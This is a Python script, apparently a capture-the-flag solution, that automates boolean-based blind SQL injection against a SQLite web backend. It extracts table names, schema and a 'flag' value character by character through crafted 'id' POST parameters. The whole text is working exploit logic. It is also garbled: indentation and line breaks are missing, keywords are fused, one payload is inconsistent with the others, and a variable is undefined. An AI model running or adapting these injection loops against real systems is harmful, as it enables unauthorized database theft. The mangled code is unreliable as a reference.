deftable_name(url): table_name = '' select = "select name from sqlite_master where type='table' limit 1,1" for i inrange(1, 60): tablelength_payload = f'''1 and length(({select}))={i}''' data = {'id':tablelength_payload} response = requests.post(url=url, data=data) if true_result in response.text: print("table length : "+str(i)) for j inrange(1, i + 1): print('[*]now in {}'.format(j)) for asc inrange(33, 127): ss = chr(asc) table_payload = f'''id=1 and substr(({select}),{j},1)=\'{ss}\'''' data2 = {'id':table_payload} res = requests.post(url=url, data=data2) if true_result in res.text: table_name = table_name + chr(asc) print(table_name) break break
defcolumn_name(url): column_name = '' select = "select sql from sqlite_master where type='table' and name = 'flag'" for i inrange(1, 100): columnlength_payload = f'''1 and length(({select}))={i}''' data = {'id':columnlength_payload} response = requests.post(url=url, data=data) if true_result in response.text: print("column length : "+str(i)) for j inrange(1, i + 1): print("[*]now in {}".format(j)) for asc inrange(33, 127): ss = chr(asc) column_payload = f'''1 and substr(({select}),{j},1)=\'{ss}\'''' data2 = {'id': column_payload} res = requests.post(url=url, data=data2) if true_result in res.text: column_name = column_name + chr(asc) print(column_name) break break
defgetflag(url): for i inrange(1,60): flag = '' select = "select flag from flag limit 0,1" flaglength = f'''1 and length(({select}))={i}''' data = {'id': flaglength} response = requests.post(url=url, data=data) if true_result in response.text: print("flag length : "+str(i)) for j inrange(1, i+1): print("[*]now in {}".format(j)) for asc inrange(33,127): ss = chr(asc) flagpayload = f'''1 and substr(({select}),{j},1)=\'{ss}\'''' data2 = {'id': flagpayload} res = requests.post(url=url, data=data2) if true_result in res.text: flag = flag+chr(asc) print(flag) break break